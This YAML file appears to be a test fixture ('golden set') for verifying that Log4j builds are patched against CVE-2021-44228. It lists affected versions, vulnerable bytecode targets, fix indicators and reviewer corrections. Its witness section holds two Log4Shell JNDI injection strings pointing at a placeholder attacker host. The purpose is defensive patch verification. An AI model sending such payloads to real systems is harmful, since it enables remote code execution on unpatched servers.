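# Golden Set: CVE-2021-44228 (Log4Shell)
# Apache Log4j Remote Code Execution Vulnerability
#
# Sprint: SPRINT_20260110_012_010_TEST
# Task: GTV-001 - High-profile Golden Sets
#
# This golden set defines the vulnerability targets for CVE-2021-44228,
# allowing binary-level verification that a patch eliminates JNDI lookup.
#
# Reviewer notes (security-team):
#   * A "fixed" verdict from this set covers CVE-2021-44228 only. The 2.15.0
#     mitigations encoded below (lookup flag, protocol allowlist) were later
#     shown to be bypassable in non-default configurations (CVE-2021-45046),
#     and 2.16.0 still had a lookup-recursion DoS (CVE-2021-45105). Those need
#     their own golden sets and must not be inferred from this one.
#   * The witness deliberately re-enables message lookups, so it exercises
#     JNDI reachability rather than the shipped default configuration.
---
id: "CVE-2021-44228"
# 1.0.0 -> 1.0.1: affected-version ranges corrected, truncated sink pattern
# fixed, witness hosts moved to a reserved TLD. Targets/indicators unchanged.
version: "1.0.1"
created: "2026-01-11T12:00:00Z"
author: "stellaops-security"
status: "approved"

# Component identification
component:
  name: "log4j-core"
  ecosystem: "maven"
  # Vulnerable range per the Apache advisory referenced below: every 2.x
  # release before 2.15.0 EXCEPT the backported security releases 2.12.2
  # (Java 7) and 2.3.1 (Java 6), which already contain the fix. The previous
  # single range ">=2.0-beta9,<2.15.0" would have flagged those as vulnerable.
  # NOTE(review): the split assumes the matcher orders 2.3.1 < 2.4 and
  # 2.12.2 < 2.13.0 (Maven ordering) - confirm against the version comparator.
  affectedVersions:
    - ">=2.0-beta9,<2.3.1"
    - ">=2.4,<2.12.2"
    - ">=2.13.0,<2.15.0"

# Vulnerability details
vulnerability:
  cveId: "CVE-2021-44228"
  aliases:
    - "Log4Shell"
    # NOTE(review): "LogJam" is the established name of CVE-2015-4000 (TLS
    # DH downgrade). It appeared in some early Log4Shell coverage but is
    # ambiguous; keep it only if downstream alias lookups depend on it.
    - "LogJam"
  severity: "CRITICAL"
  cvssScore: 10.0
  description: |
    Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages,
    and parameters do not protect against attacker controlled LDAP and other
    JNDI related endpoints. An attacker who can control log messages or log
    message parameters can execute arbitrary code loaded from LDAP servers
    when message lookup substitution is enabled.
  references:
    - url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
      title: "NVD Entry"
    - url: "https://logging.apache.org/log4j/2.x/security.html"
      title: "Apache Security Advisory"

# Vulnerability targets
# symbolPattern / sinks use JVM internal form ("pkg/Class.method") and are
# meant to be resolved against the jar's bytecode, not source.
targets:
  - function: "lookup"
    className: "org/apache/logging/log4j/core/lookup/JndiLookup"
    symbolPattern: "org/apache/logging/log4j/core/lookup/JndiLookup.lookup"
    description: "JNDI lookup method - allows remote code execution"
    criticalEdges:
      - from: "method_entry"
        to: "jndi_context_lookup"
        description: "Entry to JNDI context lookup"
    sinks:
      - "javax/naming/Context.lookup"
      # Was "javax/naming/InitialContext." - a truncated pattern that would
      # match nothing or everything in the class depending on the matcher.
      # "<init>" is the JVM constructor name; presumably the intended sink is
      # construction of the InitialContext that the lookup goes through.
      # TODO(review): confirm the matcher grammar accepts "<init>".
      - "javax/naming/InitialContext.<init>"
    expectedPatchBehavior: "disable_jndi_lookup"
  - function: "format"
    className: "org/apache/logging/log4j/core/pattern/MessagePatternConverter"
    symbolPattern: "org/apache/logging/log4j/core/pattern/MessagePatternConverter.format"
    description: "Message pattern converter - triggers lookup substitution"
    criticalEdges:
      - from: "format_entry"
        to: "substitute_call"
        description: "Entry to variable substitution"
    sinks:
      - "org/apache/logging/log4j/core/lookup/StrSubstitutor.replace"
    expectedPatchBehavior: "disable_lookup_substitution"
  - function: "resolveVariable"
    className: "org/apache/logging/log4j/core/lookup/StrSubstitutor"
    symbolPattern: "org/apache/logging/log4j/core/lookup/StrSubstitutor.resolveVariable"
    description: "Variable resolver - invokes JNDI lookup"
    criticalEdges:
      - from: "resolve_entry"
        to: "interpolator_lookup"
        description: "Entry to interpolator lookup"
    sinks:
      - "org/apache/logging/log4j/core/lookup/Interpolator.lookup"
    expectedPatchBehavior: "add_jndi_filter"

# Witness data
# The -D flag forces message lookups ON, so the witness checks whether the
# JNDI code path is reachable at all, not the build's default configuration.
# A build that is only safe because the flag defaults to true should therefore
# count as "partial"; a "fixed" verdict needs the witness to fail with the
# flag set.
# Run the witness only in a network-isolated sandbox: the payloads cause real
# DNS/LDAP/RMI egress. Hosts use the reserved ".invalid" TLD (RFC 2606) so an
# un-substituted run cannot reach a third party; the harness must substitute
# its own listener address before executing.
witness:
  command: "java -Dlog4j2.formatMsgNoLookups=false -jar target.jar"
  inputs:
    - name: "jndi_ldap_payload.txt"
      description: "Log message with JNDI LDAP lookup"
      content: "${jndi:ldap://attacker.invalid/a}"
      trigger: "jndi_ldap_lookup"
    - name: "jndi_rmi_payload.txt"
      description: "Log message with JNDI RMI lookup"
      content: "${jndi:rmi://attacker.invalid/a}"
      trigger: "jndi_rmi_lookup"

# Verification criteria
# Indicator strength differs: class_removed and method_disabled remove the
# JNDI code path; feature_flag and protocol_filter are the 2.15.0 mitigations
# that CVE-2021-45046 bypassed in non-default configurations. On their own the
# latter two should map to "partial", not "fixed".
verification:
  fixIndicators:
    - type: "class_removed"
      className: "org/apache/logging/log4j/core/lookup/JndiLookup"
      # Matches the documented jar-surgery mitigation (deleting
      # JndiLookup.class from the jar). NOTE(review): upstream 2.16.x/2.17.x
      # still ship this class, gated behind the JNDI enable flags, so the
      # previous "(2.17.0+)" wording was wrong - absence of this indicator is
      # not evidence that a jar is unpatched.
      description: "JNDI lookup class removed from jar (manual mitigation)"
    - type: "method_disabled"
      location: "JndiLookup.lookup"
      description: "Lookup returns null or throws"
    - type: "feature_flag"
      flag: "log4j2.formatMsgNoLookups"
      defaultValue: "true"
      # 2.15.0 only: 2.16.0 removed message lookups entirely, so the flag does
      # not exist there - treat absence as "not applicable", not as a negative.
      description: "Lookup disabled by default (2.15.0+)"
    - type: "protocol_filter"
      allowedProtocols: ["java", "ldap", "ldaps"]
      # 2.15.0 also restricted LDAP/LDAPS targets to localhost; that host
      # allowlist is not modelled by this indicator.
      description: "Protocol allowlist (2.15.0+)"
  expectedConfidence:
    fixed: 0.98
    partial: 0.75
    inconclusive: 0.40

# Metadata
metadata:
  reviewedBy: "security-team"
  reviewedAt: "2026-01-11T12:00:00Z"
  approvedFor: "production"
  kev: true  # Known Exploited Vulnerability
  # snake_case kept for consumer compatibility; rest of the schema is camelCase.
  cisa_due: "2021-12-24"
  tags:
    - "rce"
    - "jndi"
    - "log-injection"
    - "critical"
    - "kev"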